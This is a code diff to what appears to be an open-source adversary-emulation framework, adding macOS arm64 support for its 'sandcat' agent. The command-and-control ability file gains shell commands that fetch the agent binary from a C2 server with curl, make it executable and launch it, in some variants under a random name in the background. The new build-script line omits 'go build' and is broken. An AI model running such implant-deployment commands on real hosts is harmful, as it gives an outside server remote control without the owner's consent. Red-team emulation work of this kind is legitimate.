diff --git a/.github/workflows/go.yml b/.github/workflows/go.yml index 9c4a9434..f2d5941d 100644 --- a/.github/workflows/go.yml +++ b/.github/workflows/go.yml @@ -37,6 +37,15 @@ jobs: env: GOOS: darwin + - name: Build Darwin arm64 + run: | + cd gocat + go build -o sandcat.go-darwin-arm64 -ldflags="-s -w" sandcat.go + file sandcat.go-darwin-arm64 && ls -al sandcat.go-darwin-arm64 + env: + GOOS: darwin + GOARCH: arm64 + - name: Build Linux run: | cd gocat diff --git a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml index 1acb0489..baf24d8b 100644 --- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml +++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml @@ -44,6 +44,24 @@ curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name}; chmod +x #{agents.implant_name}; ./#{agents.implant_name} -server $server -listenP2P -v + darwin-arm64: + sh: + command: | + server="#{app.contact.http}"; + curl -s -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download > #{agents.implant_name}; + chmod +x #{agents.implant_name}; + ./#{agents.implant_name} -server $server -v + variations: + - description: Deploy as a blue-team agent instead of red + command: | + server="#{app.contact.http}"; + agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; + nohup ./$agent -server $server -group blue & + - description: Download with a random name and start as a background process + command: | + server="#{app.contact.http}"; + agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:darwin-arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; + nohup ./$agent -server $server & linux: sh: command: | diff --git a/docs/Sandcat-Details.md b/docs/Sandcat-Details.md index 1d2a6bca..3d61261e 100644 --- a/docs/Sandcat-Details.md +++ b/docs/Sandcat-Details.md @@ -23,6 +23,7 @@ various use cases. ## Precompiled Binaries Precompiled agent binaries are located in the `payloads` directory and are referenced with the following filename: - `sandcat.go-darwin` compiled binary for Mac targets +- `sandcat.go-darwin-arm64` compiled binary for Mac with ARM processor targets - `sandcat.go-linux` compiled binary for Linux targets - `sandcat.go-windows` compiled binary for Windows targets. @@ -145,4 +146,4 @@ Additionally, if you want the C2 server to compile the agent with a built-in lis Example usage: - `includeProxyPeers:all` - include all peers, regardless of what proxy methods they are listening on - `includeProxypeers:SmbPipe` - only include peers listening for SMB pipe proxy traffic -- `includeProxypeers:HTTP` - only include peers listening for HTTP proxy traffic. \ No newline at end of file +- `includeProxypeers:HTTP` - only include peers listening for HTTP proxy traffic. diff --git a/update-agents.sh b/update-agents.sh index f27823f7..2e843b31 100755 --- a/update-agents.sh +++ b/update-agents.sh @@ -5,6 +5,7 @@ function build() { GOOS=windows go build -o ../payloads/sandcat.go-windows -ldflags="-s -w" sandcat.go GOOS=linux go build -o ../payloads/sandcat.go-linux -ldflags="-s -w" sandcat.go GOOS=darwin go build -o ../payloads/sandcat.go-darwin -ldflags="-s -w" sandcat.go +GOOS=darwin GOARCH=arm64 -o ../payloads/sandcat.go-darwin-arm64 -ldflags="-s -w" sandcat.go } cd gocat && build cd ..